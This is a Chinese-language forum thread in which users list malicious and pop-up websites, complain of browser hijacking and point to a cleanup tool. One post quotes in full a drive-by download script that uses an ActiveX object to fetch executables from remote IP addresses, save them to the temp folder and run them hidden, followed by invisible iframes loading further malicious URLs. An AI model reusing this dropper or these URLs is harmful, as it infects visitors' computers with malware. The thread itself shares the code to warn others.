本文来自(www.dngz.net)
www.7939.com www.4199.com www.9505.com www.7255.com www.3448.com www.14se.com 也是一个,定时弹出来 不过我这里网吧电脑。经常有人上这个网站。有时自动弹出 http://www.1717kan.cn/index_1077.asp http://blog.ku6.com/zhuanti/mumayi/ku61/ http://www.haokan123.com/ http://www.37ss.com/index20.htm http://www.9344.cn/ip.htm http://360.ads3721.com/ads-open4.htm http://www.1717kan.cn/index_109000000.asp http://www.bj889.com/ http://www.zqmn.com/ www.ads3721.com 与 www.9505.com同源,估计是一个人搞的. 很可能是传播logo_1病毒的一个网站,,已经封杀.. www.u8u.com http://www.wxku.com/ IE被劫持,总是在打开一个网址时弹出它来。。可恶之极~! www.waigua9999.com waigua9999.com 攻击论坛的黑网站,挂马~~这是我用瑞星隔离的恶意网站: http://www.1717kan.cn/index_1077.asp http://blog.ku6.com/zhuanti/mumayi/ku61/ http://www.haokan123.com/ http://www.37ss.com/index20.htm http://www.9344.cn/ip.htm http://360.ads3721.com/ads-open4.htm http://www.1717kan.cn/index_109000000.asp http://www.bj889.com/ http://www.zqmn.com/ 恨之入骨!
[code] document.write('<script language="VBScript">'); document.write(':on error resume next'); document.write(':dl = "http://203.171.236.215/downloader.exe"'); document.write(':fname1="downloader.exe"'); document.write(': Set df = document.createElement("object")'); document.write(' : df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"'); document.write(': set SS = df.createobject("Adodb.Stream","")');
document.write(' : SS.type = 1'); document.write(':set F = df.createobject("Scripting.FileSystemObject","")'); , document.write(' : set tmp = F.GetSpecialFolder(2)'); document.write(' : SS.open'); document.write(' : fname1= F.BuildPath(tmp,fname1)'); document.write(' : Set getexe = df.CreateObject("Microsoft."&"XMLHTTP","")'); document.write(':getexe.Open "GET", dl, False'); document.write(' : getexe.Send'); document.write(' : SS.write getexe.responseBody'); document.write(' : SS.savetofile fname1,2'); document.write(' : SS.close'); document.write(':set Q = df.createobject("Shell.Application","")'); document.write(':Q.ShellExecute fname1,"","","open",0'); document.write(' </script>'); document.write('<script language="VBScript">'); document.write(':on error resume next'); document.write(':dl = "http://203.171.236.215/theopen.exe"'); document.write(':fname1="theopen.exe"'); document.write(': Set df = document.createElement("object")'); document.write(' : df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"'); document.write(': set SS = df.createobject("Adodb.Stream","")'); document.write(' : SS.type = 1'); document.write(':set F = df.createobject("Scripting.FileSystemObject","")'); document.write(' : set tmp = F.GetSpecialFolder(2)'); document.write(' : SS.open'); document.write(' : fname1= F.BuildPath(tmp,fname1)'); document.write(' : Set getexe = df.CreateObject("Microsoft."&"XMLHTTP","")'); document.write(':getexe.Open "GET", dl, False'); document.write(' : getexe.Send'); document.write(' : SS.write getexe.responseBody'); document.write(' : SS.savetofile fname1,2'); document.write(' : SS.close'); document.write(':set Q = df.createobject("Shell.Application","")'); document.write(':Q.ShellExecute fname1,"","","open",0'); (www.dngz.net)版权所有 document.write(' </script>'); document.write('<iframe src="http://59.34.197.239/theopen.html" frameborder="0" scrolling="0" width="0" height="0" align="center"></iframe> '); document.write('<iframe src="http://ip1.adanywhere.cn/menllo2.asp" width="0" height="0" frameborder="0"></iframe>'); document.write('<iframe src="http://www2.winopen.cn/pomoho.asp" width="0" height="0" frameborder="0"></iframe>'); document.write('<iframe src="http://www.f1ash8.net/13770ad.asp" width="0" height="0" frameborder="0"></iframe>'); document.write('<iframe src="http://ip.adanywhere.cn/kuaiso001.asp" width="0" height="0" frameborder="0"></iframe>'); document.write('<iframe src="http://59.34.197.239/0602328exe.htm" width="0" height="0" frameborder="0"></iframe>'); document.write('<iframe src="http://ip.adanywhere.cn/58hu03.asp" width="0" height="0" frameborder="0"></iframe>'); document.write('<iframe src="http://ip.adanywhere.cn/openopen.asp" width="0" height="0" frameborder="0"></iframe>'); [/code]7939.com,7b.com.cn,9505.com,4199.com 清除工具 by tkabc http://bbs.dngz.net/thread-111312-1-18.html
www.ads3721.com 很可能是传播logo_1病毒的一个网站,,已经封杀..
换个浏览器吧! 流氓软件和垃圾网站少多了!
占位。。。天涯又回来了?
我以前没上过这些网,谢谢了。
这是我用瑞星隔离的恶意网站: http://www.1717kan.cn/index_1077.asp http://blog.ku6.com/zhuanti/mumayi/ku61/ http://www.haokan123.com/ http://www.37ss.com/index20.htm http://www.9344.cn/ip.htm ... 都试过了,果然很多病毒,正好让我测试了Ghost Security Suite( GSS) McAfee VirusScan Enterprise 8.0i With Patch 14 简体中文企业版的功力,结果令我满意,重启电脑后没发现任何问题。
www.u8u.com dngz.net版权所有 IE被劫持,总是在打开一个网址时弹出它来。。可恶之极~!
http://www.wxku.com/ IE被它劫持,总是在打开一个网址时弹出它来。。可恶之极~!